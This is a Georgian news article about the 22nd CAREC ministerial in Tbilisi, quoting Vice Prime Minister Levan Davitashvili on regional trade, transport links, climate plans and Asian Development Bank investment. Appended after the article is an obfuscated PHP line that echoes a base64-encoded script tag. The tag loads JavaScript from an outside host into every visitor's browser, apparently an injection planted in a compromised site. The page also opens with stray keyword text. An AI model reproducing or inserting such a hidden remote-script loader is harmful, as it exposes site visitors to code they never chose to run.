celsiusi
ავერსი შნაიდერი

საქართველო პირველად მასპინძლობს CAREC-ის მინისტერიალს, პირველად არის თავჯდომარე ქვეყანა და ჩვენთვის პატივია, რომ საქართველოში გვყავს პარტნიორი ქვეყნების დელეგაციები. ეს არის მნიშვნელოვანი პლატფორმა თანამშრომლობის, ეკონომიკური კავშირების გაღრმავების მხრივ ცენტრალური აზიის, კავკასიის, ასევე სამხრეთ-აღმოსავლეთ აზიის ქვეყნებთან, – ამის შესახებ საქართველოს ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ლევან დავითაშვილმა ცენტრალური აზიის რეგიონული ეკონომიკური თანამშრომლობის პროგრამის (CAREC) რიგით 22-ე მინისტერიალზე საუბრისას განაცხადა.

როგორც ეკონომიკის მინისტრმა აღნიშნა, CAREC-ის წევრი ქვეყნები საქართველოსთვის ძალიან აქტიური ეკონომიკური პარტნიორები არიან, კავშირების აღდგენა და გამყარება კი, რაზეც საუბარია მინისტერიალის ფარგლებში, მეტად მნიშვნელოვანია ეკონომიკური განვითარების კუთხით.

მინისტრის ინფორმაციით, მინისტერიალის ფარგლებში ასევე განიხილება 2030 წლის კლიმატის გეგმები – თითოეულ ქვეყანას აქვს კლიმატის ცვლილების შერბილების, შემცირების საკუთარი სტრატეგია.

„მაგრამ ასევე ძალიან მნიშვნელოვანია რეგიონული თანამშრომლობა ინფრასტრუქტურული პროექტების კუთხითაც, რომელიც, მათ შორის ითვალისწინებს კლიმატის მიზნებს, რომელიც საერთაშორისო დონეზე ქვეყნებს აღებული აქვთ, როგორც ვალდებულება“, – განაცხადა ვიცე-პრემიერმა.

თბილისში ცენტრალური აზიის რეგიონუ​ლი ეკონომიკური თანამშრომლობის (CAREC) პროგრამის მინისტერიალმა დღეს დაიწყო მუშაობა. საქართველო წელს პირველადაა CAREC-ის თავმჯდომარე ქვეყანა 2016 წელს გაწევრიანების შემდეგ. ვიცე-პრემიერ ლევან დავითაშვილის შეფასებით, კონფერენცია ძალიან სასარგებლოდ ჩაივლის, რადგან საქართველოსაც აქვს მნიშვნელოვანი სათქმელი და კომპლექსური გეგმა კლიმატის შერბილების კუთხით. ამასთან, მისი განცხადებით, ეკონომიკური განვითარების გეგმა, რომელიც საკმაოდ აგრესიულია ჩვენი ქვეყნის შემთხვევაში, ასევე ითვალისწინებს ამ პრიორიტეტებს.

„უნდა აღინიშნოს, რომ CAREC-ის ფარგლებში, აზიის განვითარების ბანკის მიერ საქართველოში სამ მილიარდზე მეტი ინვესტიციაა განხორციელებული. ეს არის ასევე ძალიან მნიშვნელოვანი, კომპლექსური დღის წესრიგი, რომელიც მოიცავს კავშირების გამყარებას სხვადასხვა მიმართულებით – ესაა სატრანსპორტო-ლოგისტიკური, ციფრული თუ სავაჭრო კავშირების გამყარება პროგრამის წევრ ქვეყნებს შორის, რომლებიც საქართველოს მნიშვნელოვანი სავაჭრო პარტნიორები არიან“, – აღნიშნა ლევან დავითაშვილმა.

თბილისში მიმდინარე მინისტერიალს ესწრებიან CAREC-ის მონაწილე ათი ქვეყნის სახელმწიფო უწყებების უმაღლესი თანამდებობის პირები, კერძო სექტორის, საერთაშორისო დიპლომატიური კორპუსის და დონორი ორგანიზაციების წარმომადგენლები, მათ შორის აზიის განვითარების ბანკის (ADB) პრეზიდენტი მასაცუგუ ასაკავა. მინისტერიალი განიხილავს რეგიონული თანამშრომლობის მნიშვნელოვან სავაჭრო-ეკონომიკურ და სხვა საკითხებს.

275
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");